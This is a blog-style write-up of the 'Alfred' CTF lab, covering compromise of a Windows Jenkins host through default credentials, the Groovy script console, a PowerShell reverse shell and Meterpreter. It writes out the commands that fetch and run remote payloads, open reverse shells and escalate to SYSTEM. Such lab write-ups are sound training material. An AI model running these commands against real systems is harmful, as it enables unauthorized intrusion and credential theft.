From Web Exploitation to Offensive Operations
After completing the Web Penetration Testing path, I was more than ready for a shift in focus. The Web module had some real sticking points for me – most notably HTTP Smuggling, which took a lot of persistence, note-taking, testing, and failure to understand. I eventually figured it out, but I won’t pretend it came naturally.
One challenge that stood out was "What’s your name?" – it forced me to slow down and revisit some fundamentals. I spent time digging through documentation and reading up on HTTP internals just to understand what was actually happening. It was humbling, but that’s how learning in this field works – you're never done, and even the basics can still trip you up if you stop paying attention.
Now that I’ve wrapped up the Web path, I’m diving into something that aligns much more with my interests and goals: the Offensive Pentesting learning path.
This path picks up speed fast – instead of passively poking around web interfaces, I’m back to reverse shells, payload generation, process migration, token impersonation, and privilege escalation. It’s where theory meets real tooling: msfconsole, netcat, PowerShell abuse, John the Ripper, and hands-on exploitation.
Challenge 1: Alfred
The first challenge in this new path was called Alfred – a vulnerable Windows machine running Jenkins. The goal: gain an initial foothold through Jenkins, escalate privileges to SYSTEM, and capture the user flag.
Here’s a full breakdown of how I approached it:
Reconnaissance
I started with an Nmap scan, which revealed:
- Port 80 (HTTP)
- Port 8080 (HTTP – Jenkins)
- Port 3389 (RDP)
Port 8080 stood out immediately as Jenkins, a common target in CTFs due to misconfigurations and exposed script consoles.
Gaining Access to Jenkins
Navigating to port 8080, I was met with the Jenkins login screen. Rather than overthinking it, I tested the default credentials:
admin:admin
Surprisingly, it worked. I was in.
From there, I headed straight to the Script Console, which gives administrative Groovy script execution on the host machine – basically an RCE interface.
Setting Up a Reverse Shell
I prepared a PowerShell-based TCP reverse shell using a modified version of Invoke-PowerShellTcp.ps1 from Nishang. I hosted the file using:
python3 -m http.server 8000
On the Jenkins console, I ran:
def p = "powershell -Command \"iex (New-Object Net.WebClient).DownloadString('http://<my-ip>:8000/Invoke-PowerShellTcp.ps1')\"".execute()
p.waitFor()
Then, in another terminal, I listened with:
nc -lvnp 4444
After triggering the payload, I caught a shell as the user alfred\bruce.
Upgrading to Meterpreter
To make post-exploitation easier, I created a Meterpreter payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=4445 -a x86 --encoder x86/shikata_ga_nai -f exe -o clean.exe
I hosted the .exe on the HTTP server, downloaded it to the target using PowerShell via Jenkins again, and executed it:
def p = "powershell -Command \"(New-Object Net.WebClient).DownloadFile('http://<my-ip>:8000/clean.exe','clean.exe'); Start-Process 'clean.exe'\"".execute()
p.waitFor()
In msfconsole, I set up the handler:
use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST <my-ip>set LPORT 4445
run -j
Result: a fully interactive Meterpreter session.
Privilege Escalation
From Meterpreter, I ran:
whoami /priv
This revealed that SeImpersonatePrivilege and SeDebugPrivilege were enabled – two key vectors for privilege escalation.
I attempted load incognito and list_tokens -u. Although no impersonation tokens were directly available, I noted that I could still escalate through process migration.
Process Migration into SYSTEM
I listed all processes using ps and found:
PID 672 - services.exe - NT AUTHORITY\SYSTEM
To migrate, I simply ran:
migrate 672
After a short pause, the session moved into the services.exe process.
I ran getuid and confirmed:
NT AUTHORITY\SYSTEM
I had full SYSTEM access.
Post-Exploitation
At this point, I did the following:
- Searched for
user.txtandroot.txt - Used
search -f *.xmlandsearch -f secrets*to look for Jenkins credentials and sensitive configs - Dumped interesting files from
C:\Program Files (x86)\Jenkins - Ensured no persistence or dropped payloads remained
- Cleanly exited the session
Summary of Tools and Techniques Used
| Purpose | Tool / Technique |
|---|---|
| Port scanning | nmap |
| Initial access | Jenkins + Script Console |
| Shell delivery | PowerShell TCP reverse shell |
| Payload hosting | python3 -m http.server |
| Shell interaction | netcat, then msfconsole + Meterpreter |
| Privilege escalation | SeImpersonatePrivilege, migrate |
| Post-exploitation | File collection, token checks, cleanup |
Looking Ahead
The Alfred machine was the perfect start to this new phase. It combined web-based misconfigurations with Windows privilege escalation and gave me full control over a live system using only the tools and techniques I’ve practiced along the way.
Now I’m moving on to HackPark, which promises bruteforce, public exploit usage, and more privilege escalation – all built around a Windows web app target.
This is where things get practical. Let’s see what’s next.